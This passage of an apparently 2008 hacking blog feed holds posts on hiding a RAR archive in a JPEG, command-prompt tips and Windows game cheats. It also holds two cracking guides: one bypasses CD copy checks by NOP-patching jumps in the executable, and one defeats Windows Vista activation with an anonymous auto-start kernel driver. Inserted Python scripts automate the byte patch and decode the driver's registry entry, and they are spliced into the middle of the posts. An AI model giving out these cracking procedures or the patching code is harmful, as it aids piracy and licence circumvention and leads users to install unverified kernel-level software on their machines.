Now type: “&lt;strong&gt;&lt;span style="color:#333300;"&gt;COPY /b logo.jpg + secret.rar output.jpg” (without quotes)&lt;/span&gt;&lt;/strong&gt; - logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file that contains both. The /b (binary) switch is essential: without it, copy treats the inputs as text and stops at the first Ctrl-Z (0x1A) byte, and the RAR signature itself contains one.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;6.&lt;/strong&gt; After you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. 
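&lt;br /&gt;&lt;br /&gt;The following Python script is an added example and not part of the original post: it does what the COPY /b command does (plain concatenation) and then runs the check that anyone inspecting such a file would run. The JPEG and RAR bytes it uses are constructed stand-ins rather than real files, and the function names are this example's own. It walks the JPEG segment table to find the real end-of-image marker (so a thumbnail embedded in an EXIF segment cannot fool it) and reports whatever follows the image.

```python
# Added example: build and detect a JPEG + RAR polyglot (the "copy /b" trick).
# Not code from the original post. All sample bytes below are constructed.

JPEG_SOI = b"\xff\xd8"           # start of image
JPEG_EOI = b"\xff\xd9"           # end of image: viewers stop reading here
SIGNATURES = (
    (b"Rar!\x1a\x07\x01\x00", "rar5"),
    (b"Rar!\x1a\x07\x00", "rar4"),
    (b"PK\x03\x04", "zip"),
    (b"7z\xbc\xaf\x27\x1c", "7z"),
)

# Constructed minimal JPEG: SOI, an APP0 (JFIF) segment, a SOS header, four
# bytes of scan data containing a stuffed FF 00 pair, then EOI. 36 bytes total.
SAMPLE_JPEG = (
    JPEG_SOI
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    + b"\x12\xff\x00\x34"
    + JPEG_EOI
)
# Constructed "archive": the RAR 4 signature followed by filler.
SAMPLE_RAR = b"Rar!\x1a\x07\x00" + b"\x00" * 32 + b"fake archive body"


def make_polyglot(jpeg, archive):
    """Equivalent of: copy /b logo.jpg + secret.rar output.jpg"""
    if not jpeg.startswith(JPEG_SOI):
        raise ValueError("first input is not a JPEG")
    return jpeg + archive


def jpeg_end(data):
    """Offset just past the EOI marker of the JPEG at the start of data, or None.

    Walks the segment table instead of searching for FF D9, because an EXIF
    thumbnail embedded in an APP1 segment is itself a complete JPEG with its
    own EOI, and a naive search would stop there.
    """
    if not data.startswith(JPEG_SOI):
        return None
    pos = 2
    while True:
        pos = data.find(b"\xff", pos)
        if pos == -1 or len(data) - pos == 1:
            return None                      # ran off the end: truncated file
        marker = data[pos + 1]
        if marker == 0xFF:                   # fill byte before a marker
            pos += 1
        elif marker == 0xD9:                 # EOI
            return pos + 2
        elif marker in (0x00, 0x01, 0xD8) or marker in range(0xD0, 0xD8):
            pos += 2                         # stuffed byte, TEM, SOI, RSTn: no length field
        else:
            length = int.from_bytes(data[pos + 2:pos + 4], "big")
            pos += 2 + length                # skip the whole segment (SOS included)


def find_trailing_archive(data):
    """Return (offset, kind) of data appended after the image, or None."""
    end = jpeg_end(data)
    if end is None:
        return None
    trailer = data[end:]
    for sig, kind in SIGNATURES:
        hit = trailer.find(sig)
        if hit != -1:
            return (end + hit, kind)
    if trailer:
        return (end, "unknown trailing data")
    return None


def demo():
    polyglot = make_polyglot(SAMPLE_JPEG, SAMPLE_RAR)
    return find_trailing_archive(polyglot), find_trailing_archive(SAMPLE_JPEG)


if __name__ == "__main__":
    print(demo())
```

Run it with python3 and it reports the offset and type of the appended archive for the polyglot and None for the plain picture. The scan is the same thing WinRAR does when it opens output.jpg: it looks for its own signature anywhere in the file, which is exactly why the archive is only hidden from people who do not look.&lt;br /&gt;&lt;br /&gt;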
Now try opening the same file with &lt;strong&gt;WinRAR: it will show the hidden archive.&lt;/strong&gt; Keep in mind that this is concealment, not protection: the archive sits in clear after the picture's end-of-image marker, the file is noticeably larger than the picture alone, and anyone who opens it in an archiver or scans it for the RAR signature sees the contents. If the contents matter, encrypt the archive.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-8558425893762600961?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/8558425893762600961/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=8558425893762600961' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8558425893762600961'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8558425893762600961'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/for-this-you-will-only-need-to-download.html' title='Hide your files in a .jpeg file'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3903954176624111720</id><published>2008-01-31T03:43:00.000-08:00</published><updated>2008-01-31T03:52:17.392-08:00</updated><title type='text'>Customize the command prompt</title><content type='html'>&lt;strong&gt;1◘&lt;/strong&gt; Click on the Start Button, key in &lt;strong&gt;Command Prompt and hit Enter.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2◘&lt;/strong&gt; Once the Command Prompt has started, right-click the icon at the top left of the title bar and select &lt;span style="color:#006600;"&gt;Defaults&lt;/span&gt;. 
Alternatively you can select Properties if you want to have different settings for different Command Prompt shortcuts.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;3◘&lt;/strong&gt; You will now see the four tabs of options to customize. The sections that I always work with are Font, Layout and Colors. To get started, click on the Font tab. &lt;strong&gt;&lt;span style="color:#333399;"&gt;Here you will be able to change the font and size used. If you would like a micro prompt as shown below, select Raster Fonts and size 4x6&lt;/span&gt;&lt;/strong&gt;.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;4◘&lt;/strong&gt; On the Layout tab you can specify the size and location of the window as well as the buffer. I usually only change the Screen Buffer Height setting. This controls how many previous command lines are saved and can be scrolled back up through.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;5◘&lt;/strong&gt; &lt;strong&gt;Increasing this value is useful if you are looking at a large directory with more than 300 files. I always increase the Height value to the max which is 9999&lt;/strong&gt;.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;6◘&lt;/strong&gt; The &lt;strong&gt;&lt;span style="color:#000066;"&gt;Color tab is where you get to have the most fun changing the look of your Command Prompt&lt;/span&gt;&lt;/strong&gt;. Just select what you want to change the color for and then change the color.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;7◘&lt;/strong&gt; Back on the Options tab I recommend turning on &lt;strong&gt;&lt;span style="color:#006600;"&gt;Quick Edit Mode.&lt;/span&gt;&lt;/strong&gt; This allows you to easily highlight text without having to go to Edit -&gt; Mark and copy it by just right clicking. 
Then you can paste it by simply right clicking once more.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;8◘&lt;/strong&gt; When you are finished customizing your Command Prompt, just hit&lt;span style="color:#33cc00;"&gt;&lt;strong&gt; OK&lt;/strong&gt; &lt;/span&gt;to save your changes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3903954176624111720?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3903954176624111720/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3903954176624111720' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3903954176624111720'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3903954176624111720'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/1-click-on-start-button-and-key-in.html' title='Customize the command prompt'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-4648753902614484432</id><published>2008-01-31T03:38:00.000-08:00</published><updated>2008-01-31T03:51:25.811-08:00</updated><title type='text'>Tips for command prompt</title><content type='html'>Turn on &lt;strong&gt;&lt;span style="color:#009900;"&gt;Quick Edit Mode&lt;/span&gt;&lt;/strong&gt;. 
This will allow you to easily select, copy and paste with just your mouse and a right click.&lt;br /&gt;&lt;br /&gt;When typing a file or folder name, type part of the name and then hit the TAB key to cycle through matches. &lt;span style="color:#000099;"&gt;Use SHIFT+TAB to go the other direction.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;When searching for a file, type &lt;strong&gt;dir part_of_filename*&lt;/strong&gt; to look for it in the current folder. To search subdirectories as well, append the /s switch. Example: &lt;strong&gt;&lt;em&gt;dir exp* /s&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Use the up arrow to go back over past commands. Alternatively you can &lt;strong&gt;&lt;span style="color:#6600cc;"&gt;hit F7&lt;/span&gt;&lt;/strong&gt; to get a list of past commands and jump directly to one.&lt;br /&gt;&lt;br /&gt;When working with network drives, type prompt &lt;strong&gt;$m$p$g&lt;/strong&gt; to show the full network path along with the drive prompt. Other prompt settings are listed by running prompt /?.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#6633ff;"&gt;&lt;strong&gt;You can print the contents of a file by typing: copy file.txt prn&lt;br /&gt;Write the output of any command to a file by appending &gt; output.txt. 
For example: dir &gt; filelist.txt&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-4648753902614484432?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/4648753902614484432/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=4648753902614484432' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4648753902614484432'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4648753902614484432'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/turn-on-quick-edit-mode.html' title='Tips for command prompt'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-987247130683367025</id><published>2008-01-30T07:20:00.000-08:00</published><updated>2008-01-30T07:23:18.063-08:00</updated><title type='text'>How to crack ANY TYPE OF CD PROTECTION</title><content type='html'>Now I’m going to show you how to crack a CD check using W32Dasm (you can download it from &lt;strong&gt;http://prt.kgb.pl/index.php?path=misc%2Fprogramowanie&lt;/strong&gt;)&lt;br /&gt;and HIEW (&lt;strong&gt;http://www.hiew.ru/&lt;/strong&gt;). Despite the title, what follows handles the common simple case, where the check is a single call or jump close to the “insert CD” error message; protections that do more than that need more work than this.&lt;br /&gt;&lt;br /&gt;OK, let’s start:&lt;br /&gt;First of all, run the game you want to crack without the CD. 
The game doesn’t run, of course, but a window pops up with an error message. That message is how you will find the check, so remember it. For example: Please insert the - CD, or: You need the CD to play the - . ( - is the game you want to crack.) If you can’t remember it, write it on a piece of paper. Now run W32Dasm and press the first button on the &lt;strong&gt;left of the toolbar, OR go to Disassembler&lt;br /&gt;-&gt;Open file to Disassemble.&lt;/strong&gt;&lt;br /&gt;A file dialog pops up; select the exe you want to crack. Disassembly takes a few minutes.&lt;br /&gt;When it is done, the screen fills with the disassembly listing, which looks like gibberish at first. Don’t worry; the only thing to do (you can change the font if you like) is to click &lt;strong&gt;String Data References&lt;/strong&gt;, &lt;strong&gt;&lt;em&gt;the button next to the print button (Strn.REF).&lt;/em&gt;&lt;/strong&gt; A window called String Data Items opens. Scroll down and find the game’s error message. Double-click it, then close the window to go back to the listing. You are now inside the CD check routine, at the place where the message is used.&lt;br /&gt;Now comes the interesting and difficult part, so be careful. We don’t need to understand all of it, BUT we must know the &lt;strong&gt;@offset of every call and jump near the message. Write down the @offset number of each call and jump (select the line first, so the status bar turns green and shows it). You need the number after @offset, without the trailing h.&lt;br /&gt;Let’s go to HIEW.&lt;br /&gt;HIEW:&lt;br /&gt;&lt;/strong&gt;Use the cursor keys to move up and down.&lt;br /&gt;Start HIEW.exe. It opens with a list of the files in the HIEW directory. 
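&lt;br /&gt;&lt;br /&gt;Before going on with HIEW, here is the byte-level operation the remaining steps perform, as an added Python example that is not part of the original post. The instruction bytes are the ones the post uses (E9 2B F9 BF 74); the buffer around them is constructed and stands in for a real executable, and the file offset 4 is an assumption of the example. The script adds two checks the manual procedure skips: it refuses to patch unless the bytes at the offset are exactly what the disassembler showed, and it sizes the NOP run from the opcode instead of always writing five bytes, which matters because a short jump is two bytes and a near conditional jump is six.

```python
# Added example: NOP out a call/jump instruction at a known file offset, with
# length and content checks. Not code from the original post; SAMPLE_CODE is a
# constructed buffer standing in for a real executable.

NOP = 0x90

# Constructed x86 bytes: push ebp / mov ebp,esp / push ebx, then the post's
# 5-byte "E9 2B F9 BF 74" (jmp rel32) at offset 4, then a 2-byte short jump
# (EB 05) at offset 9 and three ret instructions as filler.
SAMPLE_CODE = bytes([0x55, 0x8B, 0xEC, 0x53,
                     0xE9, 0x2B, 0xF9, 0xBF, 0x74,
                     0xEB, 0x05,
                     0xC3, 0xC3, 0xC3])


def branch_length(code, offset):
    """Byte length of the call or jump at offset, or None if it is not one.

    E8/E9 (call/jmp rel32) are 5 bytes, EB and 70..7F (short jumps) are 2,
    0F 80..8F (near conditional jumps) are 6. Writing five NOPs over a 2-byte
    jump would also wipe the start of the next instruction.
    """
    op = code[offset]
    if op in (0xE8, 0xE9):
        return 5
    if op == 0xEB or op in range(0x70, 0x80):
        return 2
    if op == 0x0F and len(code) - offset != 1 and code[offset + 1] in range(0x80, 0x90):
        return 6
    return None


def branch_target(code, offset):
    """Destination of the branch at offset, as an offset into the same buffer.

    The displacement is signed little-endian and relative to the end of the
    instruction, which is why 'E9 2B F9 BF 74' at offset 4 lands at
    4 + 5 + 0x74BFF92B = 0x74BFF934.
    """
    length = branch_length(code, offset)
    if length is None:
        raise ValueError("no branch at offset 0x%x" % offset)
    disp_len = 1 if length == 2 else 4
    disp = int.from_bytes(code[offset + length - disp_len:offset + length],
                          "little", signed=True)
    return (offset + length + disp) % (2 ** 32)


def nop_branch(code, offset, expected=None):
    """Return a copy of code with the branch at offset replaced by NOPs.

    expected, if given, is the byte string the disassembler showed at that
    offset; refusing to patch on a mismatch catches a wrong file offset
    (the classic mistake is using a virtual address instead of the @offset).
    """
    length = branch_length(code, offset)
    if length is None:
        raise ValueError("no branch at offset 0x%x" % offset)
    original = code[offset:offset + length]
    if expected is not None and original != expected:
        raise ValueError("bytes at 0x%x are %s, expected %s"
                         % (offset, original.hex(), expected.hex()))
    patched = bytearray(code)
    patched[offset:offset + length] = bytes([NOP]) * length
    return bytes(patched)


def demo():
    patched = nop_branch(SAMPLE_CODE, 4, bytes.fromhex("E92BF9BF74"))
    return patched.hex(), branch_target(SAMPLE_CODE, 4)


if __name__ == "__main__":
    print(demo())
```

Running it prints the patched buffer (the five bytes at offset 4 replaced by 90 90 90 90 90, everything else untouched) and where the original jump would have gone. Passing a wrong offset or the wrong expected bytes raises instead of silently corrupting the file, which is the behaviour you want before writing to a real executable.&lt;br /&gt;&lt;br /&gt;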
Go to the directory where the game’s exe is saved and open the exe. Press F4 and a menu pops up with three modes: Text, Hex and Decode. Choose Decode, which shows the bytes as instructions. Press F5 and enter the offset you wrote down in W32Dasm; the cursor lands on the instruction at that offset.&lt;br /&gt;Before continuing, a word on what you are looking at. If the instruction under the cursor is &lt;strong&gt;E92BF9BF74, it is 5 bytes long: every two hex digits are one byte, E9-2B-F9-BF-74, so ten digits are five bytes. 90 is the opcode for NOP (no operation), and the patch replaces the instruction byte for byte: E9-2B-F9-BF-74 becomes 90-90-90-90-90. Count the bytes of the instruction you are overwriting: E9 (jmp) and E8 (call) take 5 bytes, a short jump such as EB or 74/75 takes 2, and a conditional jump starting with 0F 8x takes 6. Writing five 90s over a 2-byte jump also destroys the instruction after it.&lt;br /&gt;Press F3 (edit) and type 90 for each byte of the instruction, five times for this one. Press F9 to update (write the change to disk) and F10 to exit. Keep a backup of the original exe so you can restore it if the patch breaks the game. The CD check of the - is now patched. Congratulations!!!!&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-987247130683367025?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/987247130683367025/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=987247130683367025' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/987247130683367025'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/987247130683367025'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/now-im-gonna-show-you-how-to-crack-any.html' title='How to crack ANY TYPE OF CD 
PROTECTION'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3365447442031579173</id><published>2008-01-30T07:17:00.000-08:00</published><updated>2008-01-30T07:19:17.718-08:00</updated><title type='text'>Permanently activate windows vista</title><content type='html'>Install Windows Vista Ultimate (or another edition) without a product key.&lt;br /&gt;First apply the 2099 re-arm trick, so that the activation grace counter (the minutes left before activation is required) does not go back to normal after a reboot. Click the Start Orb button.&lt;br /&gt;Select “All Programs”, then “Accessories”.&lt;br /&gt;Right-click “&lt;strong&gt;Command Prompt&lt;/strong&gt;”, then select&lt;strong&gt; “Run as Administrator (A)”.&lt;/strong&gt;&lt;br /&gt;If User Account Control (UAC) shows a warning, click “Continue”.&lt;br /&gt;In the command prompt, type date and press Enter. You will see the following:&lt;br /&gt;&lt;br /&gt;Microsoft Windows [Version 6.0.6000]&lt;br /&gt;Copyright (c) 2006 Microsoft Corporation. All rights reserved.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;C:\Windows\system32&gt;date&lt;br /&gt;Current date: 12/19/2006 Thursday&lt;br /&gt;Enter new date:&lt;br /&gt;Enter 12/31/2099 (December 31, 2099).&lt;br /&gt;Next, type cscript slmgr.vbs -rearm. You will see something like the following:&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;C:\Windows\system32&gt;cscript slmgr.vbs -rearm&lt;br /&gt;Microsoft (R) Windows Script Host Version 5.7&lt;br /&gt;Copyright (C) Microsoft Corporation. 
All rights reserved.&lt;br /&gt;&lt;br /&gt;The command completed successfully.&lt;br /&gt;To make the change effectively, please restart the system.&lt;br /&gt;Then set the system date back to the current date by typing date again.&lt;/strong&gt; You will see the following:&lt;br /&gt;&lt;br /&gt;Microsoft Windows [Version 6.0.6000]&lt;br /&gt;Copyright (c) 2006 Microsoft Corporation. All rights reserved.&lt;br /&gt;&lt;br /&gt;C:\Windows\system32&gt;date&lt;br /&gt;Current date: 12/31/2099 Thursday&lt;br /&gt;Enter new date:&lt;br /&gt;Type in the current date, e.g. 12/19/2006.&lt;br /&gt;Exit the command prompt, but do not restart the computer.&lt;br /&gt;Download StopTimer.zip (or its torrent).&lt;br /&gt;Extract the archive into a folder. It should contain “Vista test crack.exe” and “timerstop.sys”.&lt;br /&gt;Run “Vista test crack.exe” by right-clicking it and selecting “Run as Administrator (A)”.&lt;br /&gt;Optional: press the Test button; a message pops up saying 4 timers are stopped. At this point the counter should be frozen: check with slmgr.vbs -dlv, and the minutes left should be unchanged after an interval of a few minutes. If so, continue with the following steps to run the crack at every startup.&lt;br /&gt;In the Vista test crack window, click the “Install” button. You will see a “Service installed” message if everything went properly. The crack copies the patched timerstop.sys to the system folder and installs a new service named “timerstop” that stops the kernel-mode timers in the spsys.sys system file. Be clear about what that means: a kernel-mode driver from an anonymous download is registered to load automatically at every boot, with full kernel privileges, and nothing in this procedure verifies what it actually does.&lt;br /&gt;Exit the crack and restart the computer.&lt;br /&gt;The hack is basically done. The next few steps verify that the built-in activation grace period countdown timer is actually stopped and that the crack is installed properly. 
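&lt;br /&gt;&lt;br /&gt;Separately from those verification steps, the registry export quoted at the end of this post can be decoded to see exactly what was installed. The following Python script is an added example, not from the original post: the export text is copied from the end of the post, while the parsing logic, constant names and function names are the example's own. Type 1 is a kernel-mode driver, Start 2 means it loads automatically at every boot, and the hex(2) ImagePath is a UTF-16LE REG_EXPAND_SZ string naming the driver file. This is also how to read any unfamiliar service key you come across in a .reg export during an investigation.

```python
# Added example: decode a .reg export of a service key. Not code from the
# original post; REG_EXPORT is the export quoted at the end of the post.

REG_EXPORT = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TimerStop]
"Type"=dword:00000001
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,45,00,3a,00,5c,00,57,00,69,00,6e,00,\
64,00,6f,00,77,00,73,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\
00,5c,00,54,00,69,00,6d,00,65,00,72,00,53,00,74,00,6f,00,70,00,2e,00,73,00,\
79,00,73,00,00,00
"DisplayName"="TimerStop"
'''

# SERVICE_* type flags and start modes as used by the Win32 service API.
SERVICE_TYPES = {
    0x01: "KERNEL_DRIVER",
    0x02: "FILE_SYSTEM_DRIVER",
    0x10: "WIN32_OWN_PROCESS",
    0x20: "WIN32_SHARE_PROCESS",
}
START_TYPES = {
    0: "BOOT_START",
    1: "SYSTEM_START",
    2: "AUTO_START",
    3: "DEMAND_START",
    4: "DISABLED",
}


def parse_reg(text):
    """Minimal parser for the .reg export format written by regedit.

    Returns {key_path: {value_name: value}}. dword values become ints,
    hex(2) (REG_EXPAND_SZ) values are decoded from UTF-16LE, quoted values
    become str. A trailing backslash continues a value on the next line.
    """
    joined = text.replace("\\\n", "")
    result = {}
    current = None
    for line in joined.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result[current] = {}
            continue
        name, _, raw = line.partition("=")
        name = name.strip('"')
        if raw.startswith("dword:"):
            value = int(raw[len("dword:"):], 16)
        elif raw.startswith("hex(2):"):
            data = bytes.fromhex(raw[len("hex(2):"):].replace(",", ""))
            value = data.decode("utf-16-le").rstrip("\x00")
        elif raw.startswith('"') and raw.endswith('"'):
            value = raw[1:-1]
        else:
            value = raw
        result[current][name] = value
    return result


def describe_services(parsed):
    """(service name, type, start mode, image path) for every Services\\... key."""
    summary = []
    for key, values in parsed.items():
        if "\\Services\\" not in key:
            continue
        summary.append((
            key.rsplit("\\", 1)[1],
            SERVICE_TYPES.get(values.get("Type"), "unknown"),
            START_TYPES.get(values.get("Start"), "unknown"),
            values.get("ImagePath"),
        ))
    return summary


if __name__ == "__main__":
    for entry in describe_services(parse_reg(REG_EXPORT)):
        print(entry)
```

For the export on this page it prints one tuple: TimerStop, KERNEL_DRIVER, AUTO_START and the path \??\E:\Windows\system32\TimerStop.sys (the drive letter is whatever the crack's installer saw as the system drive). The same parser works on any regedit export, so it can be pointed at a full Services dump to list every auto-start driver on a machine.&lt;br /&gt;&lt;br /&gt;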
After the restart, log on to Windows Vista and let it run for a few minutes.&lt;br /&gt;Press Windows + R.&lt;br /&gt;Type slmgr.vbs -dlv to check the time left to activate Windows Vista. If the time left is still 43200 minutes (30 days), the crack is working.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;With the crack installed, you will have the following in the registry (Type 1 is a kernel-mode driver, Start 2 means auto-start at boot, and the hex(2) ImagePath is the UTF-16 string \??\E:\Windows\system32\TimerStop.sys):&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#339999;"&gt;&lt;strong&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TimerStop]&lt;br /&gt;"Type"=dword:00000001&lt;br /&gt;"Start"=dword:00000002&lt;br /&gt;"ErrorControl"=dword:00000000&lt;br /&gt;"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,45,00,3a,00,5c,00,57,00,69,00,6e,00,\&lt;br /&gt;64,00,6f,00,77,00,73,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\&lt;br /&gt;00,5c,00,54,00,69,00,6d,00,65,00,72,00,53,00,74,00,6f,00,70,00,2e,00,73,00,\&lt;br /&gt;79,00,73,00,00,00&lt;br /&gt;"DisplayName"="TimerStop"&lt;/strong&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3365447442031579173?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3365447442031579173/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3365447442031579173' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3365447442031579173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3365447442031579173'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/permanently-activate-windows-vista.html' title='Permanently activate windows 
vista'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-162854999178673091</id><published>2008-01-30T07:12:00.000-08:00</published><updated>2008-01-30T07:16:43.036-08:00</updated><title type='text'>Windows game cheats</title><content type='html'>Minesweeper&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Reveal Mines&lt;br /&gt;&lt;br /&gt;Instructions - Minimize or close all running applications. Launch Minesweeper, then type &lt;strong&gt;xyzzy.&lt;/strong&gt; Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a &lt;strong&gt;&lt;span style="color:#009900;"&gt;tiny white pixel in the top left corner of your desktop screen&lt;/span&gt;&lt;/strong&gt;. This pixel will change to black when your mouse moves over a mine. You may need to change your desktop background to a solid color other than white or black to see the pixel.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pinball&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Extra Balls&lt;br /&gt;Instructions - Type &lt;strong&gt;1max&lt;/strong&gt; at the start of a new ball to get extra balls.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Gravity Well&lt;br /&gt;Instructions - Type &lt;strong&gt;gmax&lt;/strong&gt; at the start of a new game to activate the Gravity Well.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Instant Promotion&lt;br /&gt;Instructions - Type &lt;strong&gt;rmax&lt;/strong&gt; at the start of a new game to go up in ranks.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Skill Shot&lt;br /&gt;Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. 
There are six yellow light bars, each worth a different number of points:&lt;br /&gt;&lt;br /&gt;First: 15,000 points&lt;br /&gt;Second: 30,000 points&lt;br /&gt;Third: 75,000 points&lt;br /&gt;Fourth: 30,000 points&lt;br /&gt;Fifth: 15,000 points&lt;br /&gt;Sixth: 7,500 points&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Test Mode&lt;br /&gt;Instructions - Type &lt;strong&gt;hidden test&lt;/strong&gt; at the start of a new ball to activate Test Mode. No notification is given that it is active, but you can now left-click and drag the ball around.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Unlimited Balls&lt;br /&gt;Instructions - Type &lt;strong&gt;bmax&lt;/strong&gt; at the start of a new ball. No notification is given that it is active, but when a ball is lost a new ball appears from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;FreeCell&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Instant Win&lt;br /&gt;Instructions - Hold down &lt;strong&gt;Ctrl + Shift + F10&lt;/strong&gt; during game play. You will be asked whether you want to Abort, Retry or Ignore. Choose Abort, then move any card to 